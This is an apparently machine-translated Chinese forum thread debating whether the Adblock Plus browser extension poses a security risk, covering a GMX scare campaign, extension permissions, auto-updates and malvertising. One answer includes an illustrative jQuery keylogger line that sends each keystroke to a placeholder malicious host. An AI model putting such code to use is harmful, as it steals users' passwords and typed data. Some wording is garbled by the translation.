Adblock（Plus）是否存在安全风险？

#1 楼

它不是。这是GMX的FUD（恐惧，不确定性和疑问）广告系列，因为他们希望展示其广告。提及的广告拦截器绝对没有安全风险。他们在列表中添加了一些垃圾软件，以使其看起来更加合法。

当然，这样的活动非常罕见，尤其是来自像GMX这样的知名大公司。不幸的是，我手头没有英文资料来源（因为这是德语活动），但是由于您会说德语，因此您可能想在heise.de阅读这篇文章。

更新＃1：联合国互联网， GMX背后的一家公司，因误导客户PC上存在安全风险而误导客户而受到了很多批评。 《华尔街日报》（德语版）将GMX上显示的警告及其链接的网站命名为“恐吓运动”。

更新＃2：GMX现在表示，当出现以下警告时，它们将不再显示链接您使用了广告拦截器，但如果您使用注入广告的垃圾软件仍然会显示它，则网站http://www.browsersicherheit.info/上的列表已相应更新，现在仅列出了一小部分垃圾软件。该列表绝不是完整的，因此当您想知道浏览器是否安装了垃圾软件时，它不是可靠的来源。但是，United Internet仍然保持其立场，即他们不希望访问其网站的用户使用广告拦截器，并表示他们将来会开发其他反拦截方法（德语来源）。

#2 楼

更新

经过深思熟虑，我必须同意其他答案，尽管事实上，它可以访问您的数据，但Adblock更有可能保护您的隐私而不是入侵。真正的风险是恶意广告，它们会提示您在计算机上安装软件。 Adblock可以防止这些情况。

下面是原始的警告提示：

是的，完全是。

Adblock Plus是浏览器扩展/添加-由独立开发商开发。 Adblock可以访问所有页面上的DOM（文档对象模型）。

AdBlock的工作方式是将脚本注入浏览器，该浏览器搜索DOM，然后根据确定的内容运行hide()函数是广告。

这意味着AdBlock（以及具有该权限的任何Chrome扩展程序）都可以访问您的DOM。 Adblock无法访问JavaScript变量。

这是什么意思？

如果您正在使用安全身份验证的网站上，并且有一个JavaScript对象带有诸如AuthKey之类的私有内容，你很安全。 AdBlock无法访问JavaScript变量。

但是，AdBlock可以运行与此等效的代码。

$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

本质上，这会将您按下的任何键路由到远程服务器。

它可以用来窃取密码，甚至比窃取令牌还差。

有人说，AdBlock本身有危险吗？

在我看来，AdBlock并没有太危险，因为开发人员已经确定了自己的身份，并且被数百万人使用。如果它执行上述操作时很棘手，则可能会注意到并吹哨。

但不要认为Chrome Extensions绝对安全。他们所有人都可以窃取任何数据以及其他恶意内容。

它还能做什么？

Chrome扩展程序还可以非常轻松地执行以下安全违规行为...


将您阅读的任何电子邮件或页面的内容路由到第三方来源（如果该电子邮件包含未加密的登录信息，则您很烦）。如果您可以在屏幕上看到它，那么任何Chrome扩展程序也可以在屏幕上看到它们，没有问题。
在字段中输入信息，然后按提交按钮，例如，发送电子邮件
如果您保持浏览器打开，并且扩展知道如何进行扩展，则可以使用您的电子邮件界面（Gmail，Outlook）来将选择的电子邮件发送给您的联系人。这很简单。
更改与任何按钮关联的脚本（如果该按钮最初是与jQuery一起放置的）。例如，可以稍微更改将登录信息发送到服务器的按钮，以将信息发送到服务器和http://mymaliciousserver。这是微不足道的。

更新

通过讨论已证实AdBlock是开源的。这会让您更加信任AdBlock，但请记住，AdBlock仍然可以执行这些操作。我检查了源代码，可以肯定地说我根本不知道发生了什么。

源：我是JavaScript和Chrome扩展程序开发人员。

#3 楼

这实际上归结为信任问题。确实，今天，AdBlock扩展程序是安全的。我们知道，即使有其他答案指出，它也不会窃取您的数据，但它具有这样做的技术能力。

但是，Chrome扩展程序会以静默方式自动更新。

您是否相信AdBlock扩展程序的开发人员不会添加恶意代码？我个人这样做–拥有数百万的用户，恶意代码将很快被注意到，并且无疑会成为开发人员的职业杀手。

即使您确实信任开发人员，也仍然有不大可能的情况暴露出来您：


开发人员的Chrome应用商店帐户可能会遭到黑客入侵，攻击者可能会发布恶意更新。
开发人员可能会将扩展程序出售给不那么认真的一方。
有人可能会鼓励开发人员推送恶意代码。

对于偏执狂，可以通过以下方式缓解这些问题：


仅登录敏感站点（即银行）使用隐身模式（默认情况下，扩展名默认为禁用）。

禁用自动扩展名更新，但显然会失去很多便利。

因此，从理论上讲，这是不诚实的说“不，没有风险”，风险完全被GMX夸大了。就像我信任Google为我提供不会窃取我的个人数据的浏览器一样，我也信任AdBlock开发人员为我提供不会窃取我的数据的扩展程序。

扩展程序被更新的风险带有恶意代码的代码足够小，我根本就不用担心，如果我确实有丝毫担心，禁用扩展很容易。

#4 楼

所有软件都有安全风险，但是在这种情况下，他们的主张具有误导性。

就像所有建议都可能是不良的，并且所有交易都可能是欺诈一样。 “风险”仅表示您的安全性得不到保证，在100％的情况下都是如此。

但是对于AdBlock Plus，该软件已得到很好的理解，并由拥有以下经验的团队开发保护用户利益的良好记录。加上它是开源的，因此源代码可供您检查任何安全问题。因此，在这种情况下，风险很小。相反，

，GM​​X却使用真实性（“软件总是有风险”）来暗示该软件是危险的，充其量是误导性的，甚至是诽谤性的。这就像餐馆老板分发传单，说他的竞争对手可能会毒化自己的食物。从技术上讲，这是真的，因为您说的是“可能”而不是“是”，但从根本上来说，这种行为是不诚实的。

#5 楼

仅观察一下-我倾向于推广广告拦截器，尤其是为我那些不太精明的朋友和同事促销-正是因为它减少了安全威胁。怎么样？因为网络上大多数最恶意的内容都是带有误导性广告的形式，例如“单击此处以使您的PC更快” ...这些在很大程度上被广告拦截器所掩盖。

#6 楼

Adblock（和其他扩展程序一样，也就是浏览器开发人员）具有获取大量数据的技术能力，并且您通常会遇到与运行第三方应用程序有关的所有风险-即卖方可能是恶意的，而且他们的软件中可能存在一些漏洞，可能会破坏您的安全性。

话虽这么说，我认为AdBlock可以防御网络钓鱼。许多有问题的软件通过伪装成其他东西的广告被推送给用户-即，某个网站提供了用户想要的某些商品，但其广告看上去像一个下载按钮，并投放了一些广告软件/恶意软件产品，而不是实际的网站上的内容，以及此类“意外”下载的恶意软件会带来严重的安全风险。同样，通过运行包含零时差漏洞的广告横幅也发生了大规模的消费者攻击事件，这将导致该漏洞出现在受人尊敬的，值得信赖的网站上。

对于公司范围的安全实践，它要求AdBlock并默认在每个工作站上安装它可能是有意义的-因为它对于保护那些不会自己安装的经验不足的用户特别有用。如果再信任一个软件产品，则可能会带来风险，但对日常安全性却有正面的影响。

#7 楼

联合互联网传播这些信息的方式具有误导性（我正努力避免说“诽谤”）。目前的指控在所有客观手段上显然都是错误的，而且陈述是诽谤性的。

当然，原则上，人们必须承认Adblock（Plus）当然具有潜在的安全风险。此风险是否值得合理关注是另一回事。

Adblock（Plus）可能会带来安全风险，原因有以下三个：


它是在以下平台上运行的软件您的计算机，就像所有软件一样，原则上可以执行几乎所有操作。包括显示虚假信息或窃取您的数据。
确实会修改网页内容，这就是屏蔽广告所针对的内容。当然，众所周知，修改网页内容的软件可能会以恶意方式修改内容，并且比其他软件更容易被忽视。
它通过匹配可下载的正则表达式列表来执行此任务。一系列（不受控制/未知的）第三方，例如EasyList

因此，如果您处于超妄想模式，则您可能会担心，EasyList中的某个人（或其他过滤器列表提供者）会修改过滤列表，以便他们进行恶意操作，或者黑客劫持该网站。您的Adblock Plus插件可能会在每天/每周更新期间下载恶意列表，而无需知道并且没有验证方法（可以嵌入校验和，但这只能防止意外损坏，而不能恶意修改）。 >因此，从理论上讲，这样的恶意阻止列表可能会导致插件执行“邪恶的事情”。

幸运的是，除了JS漏洞利用之外，实际上并没有太多危害可以通过此攻击向量是由于Adblock的工作方式（它将匹配任意正则表达式，但不会进行任意怀疑，因此隐藏它不应该隐藏的某些元素或让某些广告通过几乎是最糟糕的情况）。 br />另一方面，可以在没有首先运行Adblock Plus的情况下对您使用JS漏洞。

此外，很显然，像任何第三方软件（包括Firefox或Chrome本身！）一样，Adblock Plus插件本身可能会窃取您的数据。您目前只能说的是，到目前为止还没有发生。
然后，几乎所有业务中的大型商业参与者每天都在做不可信的事情，没有人反对。
/>
现在，您必须问自己，Adblock Plus确实会窃取用户数据的可能性有多大，而在广泛部署的开放环境中，这种事情在一天或两天之内不会被发现的可能性有多大源项目。

坦率地说，如果您认为这是一个严重且现实的威胁，很可能会影响您，那么您还必须相信Microsoft与NSA合作已经在Windows和Windows Server 2003中建立了身份盗用功能。每台计算机都有一个秘密的“杀死开关”，美国国防部可以随意激活它（原则上也是可以的，而且比Adblock的作者窃取您的积蓄更可能是真的）。​​

在这种情况下，您也不应该信任GMX，因为它们会（以措辞，不会，也可能）以恶意和不道德的方式与其他方（至少与美国机构，由于施罗德（Schröder）于2001年签订了条约，但您无法与其他人分享信息。
您也不应该信任1＆1（联合互联网的另一位成员），因为他们会与who-knows-whom（作为一家美国公司）。无论是Google还是互联网的另一半。

另一方面，Adblock Plus过去显然已阻止了恶意软件在用户计算机上的安装。

#8 楼

除信任之外，其他答案都忘记提及了该问题：该adblock会修改您访问的页面。这并不得不信任更多的开发人员，这就是为什么我从未使用过广告拦截软件/浏览器插件，并强烈建议不要这样做的原因。
众所周知，网站依赖各种易碎的变量来保证安全性。例如，仅查看过去解决点击劫持的方式。没有什么可以阻止adblock错误地违反该站点依赖于安全性的不变性。

adblock和其他广告阻止软件还可以减少匿名性。攻击者可以使您运行代码来浏览DOM树并查找丢失的部分/更改，或者被动地观察到您并未提出某些请求来获取与广告相关的内容（其中某些请求可能托管在网站本身上，使其成为可能的对手）。

评论

---

有多少人将Adblock *与EasyList一起使用，而没有其他过滤器？

–好奇
2014年3月2日，2:21

---

#9 楼

这里没有人提到的是，Adblock plus以及几乎所有其他浏览器和扩展程序都可以远程更新。这意味着，即使程序被锁定到特定的“可信任”更新URL，也必须存在后门。可以将其解释为间谍软件，但间谍软件是一个抽象术语。

的确，尽管Adblock plus已被广泛接受，但大多数人都说它不安全，因为它具有读取和发送数据的权限。特别是不是恶意的。尽管大多数情况下都是开源的（包括Adblock），但浏览器软件和扩展的安全性仅与更新URL一样安全，而对于这些URL，由于无法远程访问这些服务的代码，因此无法知道其实际安全性。

显然，由于熵和拥有用户的关系，没有软件或服务器可以100％安全，但是要获得最高的安全性，您应该研究源代码，始终从源代码构建并禁用自动更新。与所有软件一样，浏览器和扩展程序的安全性仅取决于用户对其进行的保护。